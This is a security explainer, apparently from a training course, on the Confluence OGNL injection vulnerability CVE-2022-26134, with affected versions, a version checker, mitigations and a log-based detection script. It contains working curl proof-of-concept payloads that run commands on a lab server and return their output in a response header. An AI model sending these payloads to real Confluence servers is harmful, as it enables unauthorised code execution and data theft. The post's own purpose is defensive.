CVE Series: Confluence RCE

CVE-2022-26134

What is Confluence?

Confluence is a widely used collaborative software designed to streamline teamwork and knowledge sharing within organizations. Developed by Atlassian, Confluence provides a digital platform where teams can create, share, and organize various types of content, such as documents, project plans, meeting notes, and more. It serves as a centralized hub that fosters collaboration by allowing team members to collaborate in real-time, provide feedback, and make updates to shared documents. Confluence offers a user-friendly interface with features like rich text editing, version control, and customizable templates, making it versatile for a range of use cases, from project management to documentation and beyond. This software facilitates efficient communication and knowledge management, enabling teams to work cohesively regardless of their physical location, ultimately boosting productivity and enhancing the organization's overall operational effectiveness.

How is it vulnerable?

This vulnerability is an injection flaw that permits unauthenticated remote code execution (RCE) through the Object-Graph Navigation Language (OGNL). OGNL is an open-source expression language for getting and setting properties of Java objects, maintained under Apache Commons, where further details are available. The same expression language was the attack vector in the Equifax breach of 2017, which is covered in our OWASP course. In this instance, specific versions of Confluence can be manipulated through a tailored web request sent with any HTTP method (e.g., GET, POST, PATCH, TRACE). By inserting an OGNL expression into the request, an attacker can trigger execution of arbitrary code on the server.

Vulnerable Versions:

  • from 1.3.0 before 7.4.17

  • from 7.13.0 before 7.13.7

  • from 7.14.0 before 7.14.3

  • from 7.15.0 before 7.15.2

  • from 7.16.0 before 7.16.4

  • from 7.17.0 before 7.17.4

  • from 7.18.0 before 7.18.1
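To turn the list above into something you can run against an inventory, here is an added example (not from the original post) that compares a Confluence version string against the affected ranges using numeric tuple comparison, which avoids the classic mistake of comparing version strings lexicographically (where "7.4.17" would sort after "7.13.7"):

```python
# Added example (not from the original post): check a Confluence version string
# against the affected ranges listed above for CVE-2022-26134.
from typing import List, Tuple

# Each entry is "from START before FIXED", i.e. the half-open range [START, FIXED).
AFFECTED_RANGES: List[Tuple[str, str]] = [
    ("1.3.0", "7.4.17"),
    ("7.13.0", "7.13.7"),
    ("7.14.0", "7.14.3"),
    ("7.15.0", "7.15.2"),
    ("7.16.0", "7.16.4"),
    ("7.17.0", "7.17.4"),
    ("7.18.0", "7.18.1"),
]

def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '7.13.6', '7.13.6 LTS' or '7.13' into a comparable tuple of ints.
    Non-numeric suffixes are dropped; missing components are padded with 0."""
    core = version.strip().split("-")[0]
    parts = []
    for piece in core.split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)

def is_vulnerable(version: str) -> bool:
    """True when the version falls inside any listed range (START <= v < FIXED).
    Versions outside every listed range are simply reported as not listed;
    check them against the vendor advisory rather than assuming they are safe."""
    v = parse_version(version)
    return any(parse_version(lo) <= v < parse_version(hi) for lo, hi in AFFECTED_RANGES)

if __name__ == "__main__":
    # The test instance from the post (7.13.6 LTS) sits inside the 7.13 range.
    for v in ["7.13.6 LTS", "7.13.7", "7.4.16", "7.4.17", "7.18.0", "7.18.1"]:
        print(f"{v:12} {'VULNERABLE' if is_vulnerable(v) else 'not in a listed range'}")
```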

Haven't I seen this before...?

A sense of déjà vu around the 2022 Confluence vulnerability is understandable: it closely resembles an issue disclosed in August 2021, which was also an unauthenticated OGNL injection flaw. This newer vulnerability was disclosed on June 2nd, 2022, with a maximal CVSS score of 10. It is rated critical because an attacker needs nothing more than network access to the server (no credentials or user interaction), and successful exploitation can expose sensitive data or yield arbitrary code execution.

The Vulnerability:

The vulnerability at hand is an OGNL injection flaw in the HTTP server. The OGNL payload is placed in the URI of an HTTP request, and the request method does not matter: valid methods (GET, POST, PUT, etc.) and invalid ones (such as "BALH") all work. The proof-of-concept request below carries the payload URL-encoded:

curl -v http://10.0.0.28:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/

When decoded, the exploit appears as:

${@java.lang.Runtime@getRuntime().exec("touch /tmp/r7")}

The intrusion is usually detectable in access logs because the payload sits in the request URI, which the server records. A sample log entry from our test Confluence (version 7.13.6 LTS) after exploitation is:

[02/Jun/2022:16:02:13 -0700] - http-nio-8090-exec-10 10.0.0.28 GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ HTTP/1.1 302 20ms - - curl/7.68.0

Identifying vulnerable servers is straightforward as attackers can compel the server to send command output in the HTTP response. The following request demonstrates this behavior, returning the response of whoami in the attacker-created X-Cmd-Response HTTP field:

curl -v http://10.0.0.28:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/

The HTTP response then carries the header X-Cmd-Response: confluence. The payload uses the exec call to run the command, reads its output with IOUtils.toString, and uses setHeader to place that output in the server's response to the attacker.
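Because the payload lives in the request URI, the access-log line shown above is enough to detect an attempt after the fact. The following is an added example (not from the original post) that parses lines in that log format, URL-decodes the path, and flags requests carrying an OGNL expression with the markers seen in both payloads above; the three log lines are constructed test data.

```python
# Added example (not from the original post): flag CVE-2022-26134 OGNL injection
# attempts in Confluence access-log lines of the format shown above.
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# A decoded path is flagged when it carries an OGNL expression wrapper "${...}"
# AND a marker seen in the payloads above: a static reference (@class@member),
# Runtime.exec, IOUtils, or the webwork ServletActionContext handle.
OGNL_EXPR = re.compile(r"\$\{.+\}")
OGNL_MARKERS = re.compile(r"@[\w.]+@|getRuntime|\bexec\(|IOUtils|ServletActionContext")

# "[timestamp] - thread client METHOD path HTTP/x.y status ..."; METHOD is any
# token because the server accepts invalid verbs such as BALH too.
LOG_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] - (?P<thread>\S+) (?P<client>\S+) (?P<method>\S+) "
    r"(?P<path>\S+) HTTP/\d\.\d (?P<status>\d{3})"
)

def analyze_line(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for a line whose request path carries OGNL, else None.
    The path is URL-decoded twice so double-encoded attempts are not missed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote(unquote(m.group("path")))
    if not (OGNL_EXPR.search(decoded) and OGNL_MARKERS.search(decoded)):
        return None
    return {"timestamp": m.group("ts"), "client": m.group("client"),
            "method": m.group("method"), "status": m.group("status"),
            "decoded_path": decoded}

def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run analyze_line over a whole log and keep only the findings."""
    return [hit for hit in map(analyze_line, lines) if hit]

# Constructed sample log: line 1 is the exploit entry from the post, line 2 is a
# benign login request, line 3 is the same payload sent with an invalid verb.
SAMPLE_LOG = [
    "[02/Jun/2022:16:02:13 -0700] - http-nio-8090-exec-10 10.0.0.28 GET "
    "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ "
    "HTTP/1.1 302 20ms - - curl/7.68.0",
    "[02/Jun/2022:16:03:01 -0700] - http-nio-8090-exec-11 10.0.0.5 GET "
    "/login.action HTTP/1.1 200 15ms - - Mozilla/5.0",
    "[02/Jun/2022:16:03:40 -0700] - http-nio-8090-exec-12 10.0.0.28 BALH "
    "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ "
    "HTTP/1.1 302 18ms - - curl/7.68.0",
]
```

Running scan(SAMPLE_LOG) yields two findings (the GET and the BALH attempts) with the decoded OGNL expression, the client address and the response status ready to forward to a SIEM.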

How do I know I am affected?

These specially crafted URLs are designed to execute commands and download webshells, giving attackers a beachhead on the server from which to conduct further malicious actions such as installing cryptominers. Volexity reports that, in the case of this Confluence RCE vulnerability, adversaries executed commands in the wild to read the contents of the /etc/passwd and /etc/shadow files, attempted to read databases, and altered web logs to hinder forensic investigation.

Mitigation:

Some general mitigation guidance is to block external (internet-facing) traffic to Confluence servers. If this cannot be done, you should:

  • Implement an IP allowlist

  • Ensure requests being made to the server are logged and ideally ingested into a SIEM

  • Monitor server child processes for suspicious activity to detect webshells

  • If you are using a WAF, ensure rules are updated to block this CVE